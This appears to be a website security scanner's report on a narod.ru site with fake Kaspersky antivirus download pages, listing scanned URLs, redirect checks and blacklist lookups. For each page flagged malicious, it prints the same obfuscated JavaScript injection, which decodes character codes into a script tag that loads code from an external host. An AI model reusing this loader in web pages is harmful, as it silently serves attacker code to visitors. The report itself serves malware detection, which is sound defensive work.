Scanned pages/files
Request | Server response | Status |
http://iqergr2009.narod.ru/biznes/skachat-antivirus-kasperskogo-2009-s-torrenta.html | 200 OK Content-Length: 10664 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function y146(t78){document.write( String.fromCharCode(parseInt(t78)-4));} document.write("<sc"+"ript type='text/javascript' language='javascr"+"ipt' src='"); var Ao813="108K120K120K116K62K51K51K121K116K113K101K"+ "114K50K115K111K115K119K108K105K103K108K111K101K50K"+ "114K105K120K51K119K51K116K107K75K102K86K54K60K61K58K"+ "51K67K119K109K104K65K59K61K61K56K57";var Z612=Ao813.split("K"); var RZU434=0;while(RZU434<Z612.length){y146(Z612[RZU434]);RZU434++;} document.write("'></sc"+"ript>"); Antivirus reports:
| ||
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.137354332142067 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://iqergr2009.narod.ru/abnl/?adsdata=XvqicOVIudsnpyJrbFZ3gQaWQbCqFnGq7Jx0Wud0hrRfag5R75Qs8s76M28BghCuit3wx3Yw!eQAgTJYe7B!qu1a9fTvwBVSTTtMGmbqvHzjf2EAXlv8CTwQOWVDDq0hy8y4N^AwKa3ctfpxrjvT^KmcK84jqZMrSyE8j4a;5YcpDFWCmty7Xh0BZ1ijgVHB | 200 OK Content-Length: 2501 Content-Type: application/javascript | clean |
http://iqergr2009.narod.ru/wp-includes/js/comment-reply.js?ver=20081210 | 200 OK Content-Length: 1222 Content-Type: text/javascript | clean |
http://iqergr2009.narod.ru/kommentarii/besplatnyy-kluch-kasperskogo.html | 200 OK Content-Length: 11084 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function y146(t78){document.write( String.fromCharCode(parseInt(t78)-4));} document.write("<sc"+"ript type='text/javascript' language='javascr"+"ipt' src='"); var Ao813="108K120K120K116K62K51K51K121K116K113K101K"+ "114K50K115K111K115K119K108K105K103K108K111K101K50K"+ "114K105K120K51K119K51K116K107K75K102K86K54K60K61K58K"+ "51K67K119K109K104K65K59K61K61K56K57";var Z612=Ao813.split("K"); var RZU434=0;while(RZU434<Z612.length){y146(Z612[RZU434]);RZU434++;} document.write("'></sc"+"ript>"); Antivirus reports:
| ||
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.402470584894342 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://iqergr2009.narod.ru/abnl/?adsdata=cJx5iwsPiPSajlCQutXhxKjJXuS2jD45i8YwjsjEa^wqfRUhfmJuy8f;^UfMF0^ePFOgUyFRDQvsuXtMNOsHjrQN!VICqhgC!1xDxPOZ7v2Fx2uiB6KBjMeRPbHpLnABuSSjRxNBVfwluSQAylBBmm3RCLCP3DLiO60Owrzy0!8S!nIH7!s;fgpVE48JUwoo | 200 OK Content-Length: 2533 Content-Type: application/javascript | clean |
http://iqergr2009.narod.ru/filmy/skachat-kaspersky-anti-virus.html | 200 OK Content-Length: 9732 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function y146(t78){document.write( String.fromCharCode(parseInt(t78)-4));} document.write("<sc"+"ript type='text/javascript' language='javascr"+"ipt' src='"); var Ao813="108K120K120K116K62K51K51K121K116K113K101K"+ "114K50K115K111K115K119K108K105K103K108K111K101K50K"+ "114K105K120K51K119K51K116K107K75K102K86K54K60K61K58K"+ "51K67K119K109K104K65K59K61K61K56K57";var Z612=Ao813.split("K"); var RZU434=0;while(RZU434<Z612.length){y146(Z612[RZU434]);RZU434++;} document.write("'></sc"+"ript>"); Antivirus reports:
| ||
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.773575621986378 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://iqergr2009.narod.ru/abnl/?adsdata=gLjGnW4HvrU9wROczejjeH2!gwYvqGA49yf4miFOpZNMrqplm6czhFdiRktcKFpQmNXm6jP1YnhqyT3ZDJWU907FI4eS8lA5dRLgjsznKlIvfAk0NF2^^RPWX8XT5DciIrbpI!EZI!L2JuWer;S79kVOHppr9SaOZYUYk7WRQsgu7WnhKhH1Xw9K048J^woo | 200 OK Content-Length: 2505 Content-Type: application/javascript | clean |
http://iqergr2009.narod.ru/hi-tech/antivirus-kasperskogo-700124-kluch.html | 200 OK Content-Length: 10602 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function y146(t78){document.write( String.fromCharCode(parseInt(t78)-4));} document.write("<sc"+"ript type='text/javascript' language='javascr"+"ipt' src='"); var Ao813="108K120K120K116K62K51K51K121K116K113K101K"+ "114K50K115K111K115K119K108K105K103K108K111K101K50K"+ "114K105K120K51K119K51K116K107K75K102K86K54K60K61K58K"+ "51K67K119K109K104K65K59K61K61K56K57";var Z612=Ao813.split("K"); var RZU434=0;while(RZU434<Z612.length){y146(Z612[RZU434]);RZU434++;} document.write("'></sc"+"ript>"); Antivirus reports:
| ||
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.733138866495299 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://iqergr2009.narod.ru/abnl/?adsdata=M;z2CC6zc07uVRw6Ezf!u4PgTWubzMMBmd37^pGLMJOKgd2VmjxLTaEWkGI2D6OT2msXAN^GgVsTbTJl2TeLLY2IR7VtrccgTCsGNEXdS2Bt1NOekV2DW4tEkSfv8pK;ZCVsEGQKBwPDrup;BkZ^JqlHhGQV8pYWA50vD2gQrb6HlcSZ^pb6EmNeuCRmGlxV^Iso | 200 OK Content-Length: 2533 Content-Type: application/javascript | clean |
http://iqergr2009.narod.ru/muzyka/skachat-obnovleniya-na-antivirus-kasperskogo.html | 200 OK Content-Length: 10452 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function y146(t78){document.write( String.fromCharCode(parseInt(t78)-4));} document.write("<sc"+"ript type='text/javascript' language='javascr"+"ipt' src='"); var Ao813="108K120K120K116K62K51K51K121K116K113K101K"+ "114K50K115K111K115K119K108K105K103K108K111K101K50K"+ "114K105K120K51K119K51K116K107K75K102K86K54K60K61K58K"+ "51K67K119K109K104K65K59K61K61K56K57";var Z612=Ao813.split("K"); var RZU434=0;while(RZU434<Z612.length){y146(Z612[RZU434]);RZU434++;} document.write("'></sc"+"ript>"); Antivirus reports:
| ||
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.00306383608658933 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: iqergr2009.narod.ru
Result:
GET / HTTP/1.1
Host: iqergr2009.narod.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: iqergr2009.narod.ru
Referer: http://www.google.com/search?q=iqergr2009.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: iqergr2009.narod.ru
Referer: http://www.google.com/search?q=iqergr2009.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=iqergr2009.narod.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://iqergr2009.narod.ru/
Result: iqergr2009.narod.ru is not infected or malware details are not published yet.
Result: iqergr2009.narod.ru is not infected or malware details are not published yet.